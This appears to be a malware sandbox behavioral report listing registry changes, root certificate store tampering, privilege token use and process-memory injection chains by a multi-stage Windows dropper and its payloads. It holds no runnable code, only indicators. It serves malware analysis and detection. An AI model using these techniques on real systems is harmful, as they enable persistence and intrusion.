Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\netsh.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8FE5.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C922.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1696 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe
PID 1696 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe
PID 1696 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe
PID 1696 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe
PID 1696 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe
PID 1696 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe
PID 1696 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe
PID 2240 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe
PID 2240 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe
PID 2240 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe
PID 2240 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe
PID 2240 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe
PID 2240 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe
PID 2240 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe
PID 2616 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2616 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2616 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2616 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2616 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2616 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2616 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2616 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2616 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2616 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2616 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\SysWOW64\WerFault.exe
PID 2616 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\SysWOW64\WerFault.exe
PID 2616 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\SysWOW64\WerFault.exe
PID 2616 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\SysWOW64\WerFault.exe
PID 2616 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\SysWOW64\WerFault.exe
PID 2616 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\SysWOW64\WerFault.exe
PID 2616 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\SysWOW64\WerFault.exe
PID 1268 wrote to memory of 2640 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\870B.exe
PID 1268 wrote to memory of 2640 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\870B.exe
PID 1268 wrote to memory of 2640 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\870B.exe
PID 1268 wrote to memory of 2640 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\870B.exe
PID 1268 wrote to memory of 2640 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\870B.exe
PID 1268 wrote to memory of 2640 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\870B.exe
PID 1268 wrote to memory of 2640 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\870B.exe
PID 2640 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\870B.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe
